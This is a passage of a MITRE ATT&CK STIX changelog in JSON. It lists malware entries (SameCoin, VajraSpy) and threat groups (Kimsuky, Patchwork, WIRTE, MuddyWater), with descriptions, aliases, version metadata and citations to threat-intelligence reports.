                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--4e164a21-3fbe-4aaa-be69-2513fdba90f7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 13:01:30.316000+00:00",
                    "modified": "2026-04-22 00:47:27.191000+00:00",
                    "name": "SameCoin",
                    "description": "[SameCoin](https://attack.mitre.org/software/S9030) is a multi-platform wiper with Windows and Android versions that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East including in Israel.(Citation: Check Point Wirte NOV 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9030",
                            "external_id": "S9030"
                        },
                        {
                            "source_name": "Check Point Wirte NOV 2024",
                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "SameCoin"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--8205a875-3ed5-4be2-ab9b-14a7d29431d0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-09 14:58:08.050000+00:00",
                    "modified": "2026-04-23 01:32:27.375000+00:00",
                    "name": "VajraSpy",
                    "description": "[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan. (Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9006",
                            "external_id": "S9006"
                        },
                        {
                            "source_name": "ArcticWolf_DroppingElephant_July2025",
                            "description": "ArcticWolf. (2025, July 23). Dropping Elephant APT Group Targets Turkish Defense Industry With New Campaign and Capabilities: LOLBAS, VLC Player, and Encrypted Shellcode. Retrieved November 3, 2025.",
                            "url": "https://arcticwolf.com/resources/blog/dropping-elephant-apt-group-targets-turkish-defense-industry/"
                        },
                        {
                            "source_name": "K7Dhanalakshmi_VajraSpy_April2022",
                            "description": "Dhanalakshmi. (2022, April 19).  VajraSpy \u2013 An Android RAT. Retrieved November 5, 2025.",
                            "url": "https://labs.k7computing.com/index.php/vajraspy-an-android-rat/"
                        },
                        {
                            "source_name": "ESET_VajraSpy_Feb2024",
                            "description": "Stefanko, L. (2024, February 1). VajraSpy: A Patchwork of espionage apps. Retrieved October 27, 2025.",
                            "url": "https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "VajraSpy"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Pooja Natarajan, NEC Corporation India",
                        "Takemasa Kamatani , NEC Corporation"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "groups": {
            "additions": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-08-26 15:03:02.577000+00:00",
                    "modified": "2026-04-23 18:46:50.938000+00:00",
                    "name": "Kimsuky",
                    "description": "[Kimsuky](https://attack.mitre.org/groups/G0094) is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) \n\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\n\nDPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under [Lazarus Group](https://attack.mitre.org/groups/G0032), rather than tracking operationally distinct subgroups.",
                    "aliases": [
                        "Kimsuky",
                        "Black Banshee",
                        "Velvet Chollima",
                        "Emerald Sleet",
                        "THALLIUM",
                        "APT43",
                        "TA427",
                        "Springtail",
                        "Earth Kumiho",
                        "PatheticSlug"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0094",
                            "external_id": "G0094"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "PatheticSlug",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "Black Banshee",
                            "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "THALLIUM",
                            "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "APT43",
                            "description": "(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "Emerald Sleet",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "TA427",
                            "description": "(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "Earth Kumiho",
                            "description": "(Citation: Rapid7 Threat Landscape Actors March 2026)"
                        },
                        {
                            "source_name": "Kimsuky",
                            "description": "(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "Springtail",
                            "description": "(Citation: Symantec Troll Stealer 2024)"
                        },
                        {
                            "source_name": "Velvet Chollima",
                            "description": "(Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "AhnLab Kimsuky Kabar Cobra Feb 2019",
                            "description": "AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.",
                            "url": "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf"
                        },
                        {
                            "source_name": "EST Kimsuky April 2019",
                            "description": "Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.",
                            "url": "https://blog.alyac.co.kr/2234"
                        },
                        {
                            "source_name": "Netscout Stolen Pencil Dec 2018",
                            "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.",
                            "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
                        },
                        {
                            "source_name": "Zdnet Kimsuky Dec 2018",
                            "description": "Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.",
                            "url": "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/"
                        },
                        {
                            "source_name": "CISA AA20-301A Kimsuky",
                            "description": "CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-301a"
                        },
                        {
                            "source_name": "Cybereason Kimsuky November 2020",
                            "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.",
                            "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
                        },
                        {
                            "source_name": "EST Kimsuky SmokeScreen April 2019",
                            "description": "ESTSecurity. (2019, April 17). Analysis of the APT Campaign \u2018Smoke Screen\u2019 targeting to Korea and US  \ucd9c\ucc98: https://blog.alyac.co.kr/2243 [\uc774\uc2a4\ud2b8\uc2dc\ud050\ub9ac\ud2f0 \uc54c\uc57d \ube14\ub85c\uadf8]. Retrieved September 29, 2021.",
                            "url": "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf"
                        },
                        {
                            "source_name": "Malwarebytes Kimsuky June 2021",
                            "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/"
                        },
                        {
                            "source_name": "Proofpoint TA427 April 2024",
                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                        },
                        {
                            "source_name": "Mandiant APT43 March 2024",
                            "description": "Mandiant. (2024, March 14). APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations. Retrieved May 3, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt43-report-en.pdf"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "MSFT-AI",
                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
                        },
                        {
                            "source_name": "Rapid7 Threat Landscape Actors March 2026",
                            "description": "Rapid7. (2026, March 18). 2026 GLOBAL  THREAT LANDSCAPE  REPORT: Decoding the Accelerated Cyber Attack Cycle. Retrieved April 18, 2026.",
                            "url": "https://www.rapid7.com/cdn/assets/bltc1ddd6561ab54a26/69ba67de50ca691edcd3f5b7/rapid7-threat-landscape-report-2026.pdf"
                        },
                        {
                            "source_name": "Symantec Troll Stealer 2024",
                            "description": "Symantec Threat Hunter Team. (2024, May 16). Springtail: New Linux Backdoor Added to Toolkit. Retrieved January 17, 2025.",
                            "url": "https://www.security.com/threat-intelligence/springtail-kimsuky-backdoor-espionage"
                        },
                        {
                            "source_name": "Securelist Kimsuky Sept 2013",
                            "description": "Tarakanov , D.. (2013, September 11). The \u201cKimsuky\u201d Operation: A North Korean APT?. Retrieved August 13, 2019.",
                            "url": "https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/"
                        },
                        {
                            "source_name": "ThreatConnect Kimsuky September 2020",
                            "description": "ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.",
                            "url": "https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dongwook Kim, KISA",
                        "Jaesang Oh, KC7 Foundation",
                        "Taewoo Lee, KISA",
                        "Wai Linn Oo, Kernellix Co.,Ltd."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "5.2"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--9559ecaf-2e75-48a7-aee8-9974020bc772",
                    "created": "2017-05-31 21:32:07.928000+00:00",
                    "modified": "2025-04-25 14:49:59.530000+00:00",
                    "name": "MONSOON",
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0042",
                            "external_id": "G0042"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:07.145000+00:00",
                    "modified": "2025-10-21 23:13:16.458000+00:00",
                    "name": "Patchwork",
                    "description": "[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
                    "aliases": [
                        "Patchwork",
                        "Hangover Group",
                        "Dropping Elephant",
                        "Chinastrats",
                        "MONSOON",
                        "Operation Hangover"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0040",
                            "external_id": "G0040"
                        },
                        {
                            "source_name": "Patchwork",
                            "description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
                        },
                        {
                            "source_name": "Chinastrats",
                            "description": "(Citation: Securelist Dropping Elephant)"
                        },
                        {
                            "source_name": "Dropping Elephant",
                            "description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
                        },
                        {
                            "source_name": "Hangover Group",
                            "description": "[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)"
                        },
                        {
                            "source_name": "Cymmetria Patchwork",
                            "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
                        },
                        {
                            "source_name": "Operation Hangover May 2013",
                            "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20140424084220/http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf"
                        },
                        {
                            "source_name": "Symantec Patchwork",
                            "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
                            "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries"
                        },
                        {
                            "source_name": "Unit 42 BackConfig May 2020",
                            "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.",
                            "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/"
                        },
                        {
                            "source_name": "Operation Hangover",
                            "description": "It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
                        },
                        {
                            "source_name": "Securelist Dropping Elephant",
                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant \u2013 aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.",
                            "url": "https://securelist.com/the-dropping-elephant-actor/75328/"
                        },
                        {
                            "source_name": "PaloAlto Patchwork Mar 2018",
                            "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
                        },
                        {
                            "source_name": "TrendMicro Patchwork Dec 2017",
                            "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
                            "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
                        },
                        {
                            "source_name": "Volexity Patchwork June 2018",
                            "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
                            "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
                        },
                        {
                            "source_name": "MONSOON",
                            "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)"
                        },
                        {
                            "source_name": "Forcepoint Monsoon",
                            "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.",
                            "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.6"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-02-05 17:56:55.233000+00:00",
                    "modified": "2025-04-25 14:49:37.027000+00:00",
                    "name": "Stolen Pencil",
                    "description": "[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)",
                    "aliases": [
                        "Stolen Pencil"
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0086",
                            "external_id": "G0086"
                        },
                        {
                            "source_name": "Stolen Pencil",
                            "description": "(Citation: Netscout Stolen Pencil Dec 2018)"
                        },
                        {
                            "source_name": "Netscout Stolen Pencil Dec 2018",
                            "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.",
                            "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-05-24 17:02:44.226000+00:00",
                    "modified": "2026-04-23 02:15:29.965000+00:00",
                    "name": "WIRTE",
                    "description": "[WIRTE](https://attack.mitre.org/groups/G0090) is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. [WIRTE](https://attack.mitre.org/groups/G0090) has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)(Citation: Check Point Wirte NOV 2024)(Citation: Palo Alto Ashen Lepus DEC 2025)",
                    "aliases": [
                        "WIRTE",
                        "Ashen Lepus"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0090",
                            "external_id": "G0090"
                        },
                        {
                            "source_name": "WIRTE",
                            "description": "(Citation: Lab52 WIRTE Apr 2019)"
                        },
                        {
                            "source_name": "Ashen Lepus",
                            "description": "(Citation: Palo Alto Ashen Lepus DEC 2025)"
                        },
                        {
                            "source_name": "Check Point Wirte NOV 2024",
                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
                        },
                        {
                            "source_name": "Lab52 WIRTE Apr 2019",
                            "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.",
                            "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/"
                        },
                        {
                            "source_name": "Palo Alto Ashen Lepus DEC 2025",
                            "description": "Unit 42. (2025, December 11). Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite. Retrieved April 20, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/"
                        },
                        {
                            "source_name": "Kaspersky WIRTE November 2021",
                            "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022.",
                            "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Lab52 by S2 Grupo"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0"
                }
            ],
            "major_version_changes": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-23 03:26:57.416000+00:00",
                    "name": "MuddyWater",
                    "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   ",
                    "aliases": [
                        "MuddyWater",
                        "Earth Vetala",
                        "MERCURY",
                        "Static Kitten",
                        "Seedworm",
                        "TEMP.Zagros",
                        "Mango Sandstorm",
                        "TA450",
                        "MuddyKrill"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0069",
                            "external_id": "G0069"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "MERCURY",
                            "description": "(Citation: Anomali Static Kitten February 2021)"
                        },
                        {
                            "source_name": "Static Kitten",
                            "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "MuddyKrill",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "TEMP.Zagros",
                            "description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "Mango Sandstorm",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "TA450",
                            "description": "(Citation: Proofpoint TA450 Phishing March 2024)"
                        },
                        {
                            "source_name": "Seedworm",
                            "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "Earth Vetala",
                            "description": "(Citation: Trend Micro Muddy Water March 2021)"
                        },
                        {
                            "source_name": "MuddyWater",
                            "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)"
                        },
                        {
                            "source_name": "ClearSky MuddyWater Nov 2018",
                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
